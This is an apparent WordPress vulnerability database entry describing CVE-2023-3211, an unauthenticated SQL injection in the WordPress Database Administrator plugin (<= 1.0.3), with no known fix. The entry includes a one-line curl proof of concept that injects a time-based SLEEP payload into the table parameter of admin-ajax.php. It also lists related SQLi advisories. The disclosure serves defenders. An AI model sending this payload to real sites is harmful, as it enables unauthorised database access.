WordPress Database Administrator <= 1.0.3 – Unauthenticated SQL Injection | CVE 2023-3211 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

Proof of Concept

Run the command: 

`curl -i -s -k -X POST --data-binary "action=wdaSetTableActionResponse&table=wp_users%20WHERE%20SLEEP(1)=1%20&request=browse" "https://example.com/wp-admin/admin-ajax.php"`

and see that the response is slow due to the `SLEEP` function.

Affects Plugins

wp-database-admin

No known fix

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Christiaan Swiers

Submitter

Christiaan Swiers

Submitter website

https://mijnsecuritypartner.nl

Submitter twitter

Verified

Yes

WPVDB ID

873824f0-e8b1-45bd-8579-bc3c649a54e5

Timeline

Publicly Published

2023-07-24 (about 9 months ago)

Added

2023-07-24 (about 9 months ago)

Last Updated

2023-07-24 (about 9 months ago)

Other

Published

Title

Published

2022-02-28

Title

Advanced Booking Calendar < 1.7.0 - Unauthenticated SQL Injection

Published

2019-03-15

Title

Better Search 2.2.2 - Unauthenticated SQL Injection

Published

2022-08-01

Title

NEX-Forms < 7.9.7 - Authenticated SQLi

Published

2022-02-01

Title

Conversios.io < 4.6.2 - Subscriber+ SQL Injection

Published

2022-09-20

Title

Search Logger <= 0.9 - Admin+ SQLi